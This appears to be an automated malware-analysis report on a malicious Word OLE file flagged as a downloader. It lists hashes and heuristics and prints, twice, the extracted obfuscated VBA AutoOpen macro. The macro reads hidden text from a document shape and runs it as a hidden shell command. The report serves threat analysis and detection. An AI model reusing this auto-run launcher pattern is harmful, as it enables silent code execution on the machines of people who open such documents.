Office (OLE) malware analysis — malicious · bc4fa4a08c51326d

MALICIOUS

Office (OLE)

75.1 KB Created: 2018-11-22 21:11:00 Authoring application: Microsoft Office Word First seen: 2019-05-31

MD5: e34188a3eccf9cd3eaee2d282b192e86 SHA-1: a02f774e4d5135fdb986c3dbdb65869f1c8ce452 SHA-256: bc4fa4a08c51326daadd3263ea3cce5735bad48bacd2885f153bb1a8f694ca92

142 Risk Score

Heuristics 5

ClamAV: Doc.Downloader.Generic-6757155-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Generic-6757155-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2205 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2205 bytes
SHA-256: `470f7fa12f82caca922771f07b2267f0e972e8333b58542634c79e7cd66c02d7`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "jwBqQrUtJIEw" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Select Case XwIkTFuiH Case 196957860 rcYSFU = Rnd(fCraiQdXM) fzWZzz = zHCLK hpHmotdL = Log(206997938) End Select Select Case uQKsiTPUN Case 311631574 zPSSJV = Rnd(zmKhiKniW) DUbGXju = YNRsFN zwhAcwHhi = Log(221760974) End Select Set MhzFzzsR = Shapes("CXrwIjwAM") Select Case UOobHZ Case 248445099 jUscKzhfd = Rnd(EijrOShw) IBWiB = AkzJfwM fivwjKwas = Log(44611759) End Select Select Case ASDSVGaf Case 110236149 qYMzQJUz = Rnd(DSzNpjZ) tvdLDi = HzsuazEN oNSKZiTMo = Log(9026880) End Select Select Case hRDmPYuP Case 315693242 lQhDWIWz = Rnd(CInWlNuV) bDFApfH = YiHitCIPu zEBUjWrZa = Log(299690131) End Select nmjzlnzzCzN = "" + hcAWt + dsJmqG + MhzFzzsR.TextFrame.TextRange.Text + iWwor + ISVBm + JPhZOSH Select Case mHTouonRm Case 304271720 TREiEo = Rnd(JjInvNhr) jYlQmE = wmldw RRwSj = Log(238094357) End Select Select Case SkWBw Case 182811966 huCfj = Rnd(dFKuDiza) OzuQJBR = MjLOsIYnk zljjwlr = Log(227821814) End Select Select Case VzCOl Case 98347948 VWqGj = Rnd(JWXZaqF) upJRnp = iATwnZbjA hvQnzj = Log(284343370) End Select Interaction.Shell! nmjzlnzzCzN, 0 Select Case qzNXzTw Case 26267060 NbtEnW = Rnd(GqWfUOopn) KlZOFIRN = EvCdRndIw nswdi = Log(328313285) End Select Select Case LBCKitzQ Case 1513416 VPpjPz = Rnd(nmPfB) jXfmtvNs = FtpsI MXtWZnuji = Log(229933552) End Select End Sub

SHA-256: 470f7fa12f82caca922771f07b2267f0e972e8333b58542634c79e7cd66c02d7

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "jwBqQrUtJIEw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Select Case XwIkTFuiH
         Case 196957860
            rcYSFU = Rnd(fCraiQdXM)
            fzWZzz = zHCLK
            hpHmotdL = Log(206997938)
      End Select
   Select Case uQKsiTPUN
         Case 311631574
            zPSSJV = Rnd(zmKhiKniW)
            DUbGXju = YNRsFN
            zwhAcwHhi = Log(221760974)
      End Select
Set MhzFzzsR = Shapes("CXrwIjwAM")
   Select Case UOobHZ
         Case 248445099
            jUscKzhfd = Rnd(EijrOShw)
            IBWiB = AkzJfwM
            fivwjKwas = Log(44611759)
      End Select
   Select Case ASDSVGaf
         Case 110236149
            qYMzQJUz = Rnd(DSzNpjZ)
            tvdLDi = HzsuazEN
            oNSKZiTMo = Log(9026880)
      End Select
   Select Case hRDmPYuP
         Case 315693242
            lQhDWIWz = Rnd(CInWlNuV)
            bDFApfH = YiHitCIPu
            zEBUjWrZa = Log(299690131)
      End Select
nmjzlnzzCzN = "" + hcAWt + dsJmqG + MhzFzzsR.TextFrame.TextRange.Text + iWwor + ISVBm + JPhZOSH
   Select Case mHTouonRm
         Case 304271720
            TREiEo = Rnd(JjInvNhr)
            jYlQmE = wmldw
            RRwSj = Log(238094357)
      End Select
   Select Case SkWBw
         Case 182811966
            huCfj = Rnd(dFKuDiza)
            OzuQJBR = MjLOsIYnk
            zljjwlr = Log(227821814)
      End Select
   Select Case VzCOl
         Case 98347948
            VWqGj = Rnd(JWXZaqF)
            upJRnp = iATwnZbjA
            hvQnzj = Log(284343370)
      End Select
Interaction.Shell! nmjzlnzzCzN, 0
   Select Case qzNXzTw
         Case 26267060
            NbtEnW = Rnd(GqWfUOopn)
            KlZOFIRN = EvCdRndIw
            nswdi = Log(328313285)
      End Select
   Select Case LBCKitzQ
         Case 1513416
            VPpjPz = Rnd(nmPfB)
            jXfmtvNs = FtpsI
            MXtWZnuji = Log(229933552)
      End Select
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.